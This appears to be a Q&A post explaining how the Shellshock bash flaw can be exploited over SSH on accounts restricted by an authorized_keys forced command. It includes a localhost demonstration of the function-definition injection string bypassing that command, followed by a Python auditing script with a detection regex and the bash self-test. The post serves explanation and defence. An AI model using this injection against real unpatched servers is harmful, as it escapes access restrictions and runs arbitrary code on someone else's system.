Shellshock – How Can It Be Exploited Over SSH?

Tags: bash, shellshock, ssh

Apparently, the Shellshock Bash exploit CVE-2014-6271 can be exploited over the network via SSH. I can imagine how the exploit would work via Apache/CGI, but I cannot imagine how that would work over SSH.

Can somebody please provide an example of how SSH would be exploited, and what harm could be done to the system?

CLARIFICATION

AFAIU, only an authenticated user can exploit this vulnerability via SSH. What use is this exploit for somebody who has legitimate access to the system anyway? I mean, this exploit does not provide privilege escalation (he cannot become root), so he can do no more than he could have done after simply logging in legitimately via SSH.

Best Answer

One example where this can be exploited is on servers with an authorized_keys forced command. When adding an entry to ~/.ssh/authorized_keys, you can prefix the line with command="foo" to force foo to be run any time that ssh public key is used. With this exploit, if the target user's shell is set to bash, they can take advantage of the exploit to run things other than the command that they are forced to.

This would probably make more sense with an example, so here is one:

sudo useradd -d /testuser -s /bin/bash testuser
sudo mkdir -p /testuser/.ssh
sudo sh -c "echo command=\\\"echo starting sleep; sleep 1\\\" $(cat ~/.ssh/id_rsa.pub) > /testuser/.ssh/authorized_keys"
sudo chown -R testuser /testuser

Here we set up a user testuser that forces any ssh connection using your ssh key to run echo starting sleep; sleep 1.

We can test this with:

$ ssh testuser@localhost echo something else
starting sleep

Notice how our echo something else doesn't get run, but the starting sleep shows that the forced command did run.

Now let's show how this exploit can be used:

$ ssh testuser@localhost '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
starting sleep

This works because sshd sets the SSH_ORIGINAL_COMMAND environment variable to the command passed. So even though sshd ran sleep and not the command I told it to, my code still gets run because of the exploit.
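The answer above identifies the exposed population precisely: accounts whose login shell is bash and whose authorized_keys entries rely on a forced command, since sshd hands the forced command to that shell with SSH_ORIGINAL_COMMAND (and other client-influenced variables) already in the environment. The following script is an added example, not code from the answer or from OpenSSH. It inventories forced-command entries from constructed authorized_keys lines (including the line the answer's setup writes), flags values that match the "() {" function-definition signature that public IDS/WAF rules for CVE-2014-6271 used, and runs the commonly published self-test against the local bash binary. The sample lines and the command values in it are constructed for the demonstration.

```python
import re
import subprocess

# Key-type prefixes that mark the start of the key field (no options present).
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-", "sk-ssh-", "sk-ecdsa-")

# Signature from public Snort/ModSecurity rules for CVE-2014-6271: an
# environment value beginning with a bash function definition "() {".
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def authorized_keys_options(line):
    """Parse the leading options field of an authorized_keys line into a dict.

    Flags (no-pty) map to True; quoted values honour backslash escapes, so
    command="echo \"hi\"" yields 'echo "hi"'. Comments and option-less
    lines yield an empty dict.
    """
    line = line.strip()
    if not line or line.startswith("#") or line.startswith(KEY_TYPES):
        return {}
    opts, name, value, in_quotes, i = {}, [], None, False, 0
    while i < len(line):
        c = line[i]
        if in_quotes:
            if c == "\\" and i + 1 < len(line):   # escaped character inside quotes
                value.append(line[i + 1])
                i += 2
                continue
            if c == '"':
                in_quotes = False
            else:
                value.append(c)
        elif c == '"':
            in_quotes = True
        elif c == "=" and value is None:          # switch from option name to value
            value = []
        elif c == ",":                             # option separator
            opts["".join(name)] = "".join(value) if value is not None else True
            name, value = [], None
        elif c.isspace():                          # end of options; key type follows
            break
        else:
            (value if value is not None else name).append(c)
        i += 1
    if name:
        opts["".join(name)] = "".join(value) if value is not None else True
    return opts


def forced_command(line):
    """Return the command="..." option of an authorized_keys line, or None."""
    cmd = authorized_keys_options(line).get("command")
    return cmd if isinstance(cmd, str) else None


def audit_authorized_keys(lines):
    """Return (line number, forced command) for every entry using a forced command.

    On a host whose login shell is bash, these are the entries the answer
    describes: the forced command does not constrain an unpatched bash.
    """
    return [(n, cmd) for n, line in enumerate(lines, 1)
            if (cmd := forced_command(line)) is not None]


def looks_like_shellshock(value):
    """True if a string (e.g. a would-be SSH_ORIGINAL_COMMAND) carries the payload shape."""
    return bool(SHELLSHOCK_RE.match(value))


def bash_is_vulnerable(bash="bash"):
    """Run the published CVE-2014-6271 self-test against a bash binary.

    A patched bash prints only 'test'; an unpatched one also executes the code
    after the function body. Returns None if bash cannot be run here.
    """
    env = {"x": "() { :;}; echo vulnerable", "PATH": "/usr/local/bin:/usr/bin:/bin"}
    try:
        res = subprocess.run([bash, "-c", "echo test"], env=env,
                             capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in res.stdout


# Constructed sample authorized_keys content (keys truncated, not real keys).
SAMPLE_KEYS = [
    "# keys for testuser (constructed sample)",
    'command="echo starting sleep; sleep 1" ssh-rsa AAAAB3NzaC1yc2EAAAA... admin@laptop',
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA... backup@host",
    'no-pty,command="rsync --server \\"/srv/backup\\"" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA... backup@host',
]

if __name__ == "__main__":
    for n, cmd in audit_authorized_keys(SAMPLE_KEYS):
        print(f"line {n}: forced command {cmd!r}")
    for sample in ("echo something else", "() { :;}; echo MALICIOUS CODE"):
        print(f"{sample!r}: shellshock shape = {looks_like_shellshock(sample)}")
    print("local bash vulnerable:", bash_is_vulnerable())
```

The parser walks the options field character by character rather than splitting on commas, because a forced command may itself contain commas, spaces and escaped quotes. The signature check is only a filter for logs or wrappers you already capture values in; it is not a mitigation, since on a forced-command account sshd has already started bash with the hostile environment before any wrapper runs. The fix is a patched bash or a login shell that does not import functions from the environment.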
